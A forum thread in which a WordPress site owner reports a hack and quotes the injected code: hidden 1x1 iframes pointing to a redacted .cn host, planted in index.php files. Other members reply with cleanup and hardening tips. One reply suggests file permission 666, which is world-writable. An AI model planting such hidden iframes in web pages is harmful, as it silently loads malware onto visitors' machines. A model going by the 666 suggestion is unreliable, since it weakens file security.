7 {{ upvoteCount | shortNum }}
7 {{ upvoteCount | shortNum }}

MY WP SIte Hacked? Need Advice!

by reapr
6 replies
  • WEB DESIGN
    • |
I noticed my sales a few days ago and went and checked out my wordpress sites.

I got a function error from one of the php files and eleminated it because a few extra lines of white space was added. Then I noticed something else in my index php file ... at the very bottom.

When my main index page was loading you could see these urls as like a download. Here is the code I found.

<iframe src="http://xxx.cn/xx.cgi?xxx61" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://xxx.cn/xx.cgi?xxx62" width=1 height=1 style="visibility: hidden"></iframe>
N
ow when I checked out the links above it just gave me a white page.
Needless to say I was quite surprised.

I found it in my root directory and even in the index page of my wp-content and wp-admin

I have the site functioning all now but ... have no idea how to stop it.

This affects several sites.

Thanks for any help.
#advice #hacked #site
  • Profile picture of the author Mickm
    Change the permissions to 666, 644 or 755 (depending on what the file/folder is for)

    Change your username and password on the hosting account

    Remove the iframe from all of the infected pages and re-upload.

    I had something like this happen to me a while ago.
    Signature
    SEO Since '97
    {{ DiscussionBoard.errors[715629].message }}
    • Profile picture of the author Karen Blundell
      also change your passwords to your WordPress admin as well.
      Make sure you upgrade to the latest version of WordPress

      download the latest version of Malwarebytes' Anti-Malware at Malwarebytes.org and run a scan. You may have a browser hijacker and somehow they got your passwords.

      How to know if your browser is hijacked:

      search Google for Malwarebytes or any other reputable Anti-virus program of which you know the correct URL
      If you are re-directed to another page other then the proper URL, you guessed it, you have a browser hijacker virus and you need to clean your infected computer. Unfortunately it won't just take one program to clean out these viruses

      Check it out first and post here and I will give further instructions, if needed.
      Signature
      ---------------
      {{ DiscussionBoard.errors[715967].message }}
    • Profile picture of the author reapr
      Originally Posted by Mickm View Post

      Change the permissions to 666, 644 or 755 (depending on what the file/folder is for)

      Change your username and password on the hosting account

      Remove the iframe from all of the infected pages and re-upload.

      I had something like this happen to me a while ago.
      Do I change the folder or the file ...
      The main page affected was index.php in the root!

      Is there any way to goto their host and have their sites taken down?
      Signature
      Free Niche Keywords and Niche Ideas!
      {{ DiscussionBoard.errors[716956].message }}
  • Profile picture of the author Abledragon
    A couple of other things you can do once your blog is cleaned up:

    1) Install the WP-Security-Scan plugin, run the scan and follow their suggestions
    2) Install and activate the Bad Behaviour plugin and run it alongside Akismet
    3) Either use .htaccess or, with support from your hosting provider if necessary, place password protection on your wp-admin folder. This means that logging into your admin screens will become a 2 stage process instead of one, but it'll slow those hackers down.

    Cheers,

    Martin.
    Signature
    WealthyDragon - Earning My Living Online
    {{ DiscussionBoard.errors[717397].message }}
    • Profile picture of the author reapr
      Thanks all for the advice!

      I have to add I am stumped as to how this has happened. I have managed to get my money earners back up in order that is the highest earning sites getting top priority.

      This is theft and it is an interruption of revenue. It is no different than someone cutting power to a physical business and that brick and mortar store not being able to collect revenue on sales due to the interruption of a service.

      It is no different than arriving home from work and realizing that hey ... something is not right and then over several days you realize that the burglar has made off with several items in a stealth manner.

      My host has said there is not much I can do. They said that the fact they are wordpress sites update to the latest version. Well I just realized that two of the hacked sites are the latest version. All the sites affected are on 3 accounts with the host. So now I am wondering if it is a problem with the host and not so much with wordpress.
      Signature
      Free Niche Keywords and Niche Ideas!
      {{ DiscussionBoard.errors[720348].message }}
  • Profile picture of the author Abledragon
    Even though your version may be the latest, if an earlier version of WP was compromised (maybe because that one went a couple of releases without being updated) then your newest version will be compromised too.

    Once you've cleaned everything up follow the steps I outlined above.

    Finally, you can check with Google whether your compromised version got into their cache with this neat tool:

    Cachechecker - How to check if your site has been hacked

    If the spam links are there you can go into Google WebMaster's Tools and ask them to review your site (once you've cleaned it up!) and remove the 'potentially harmful' tag.

    And here are some more articles on security for Wordpress:

    http://www.wealthydragon.com/blog/20...rdpress-blogs/

    (See also the Related Articles)

    Cheers,

    Martin.
    Signature
    WealthyDragon - Earning My Living Online
    {{ DiscussionBoard.errors[720492].message }}

Trending Topics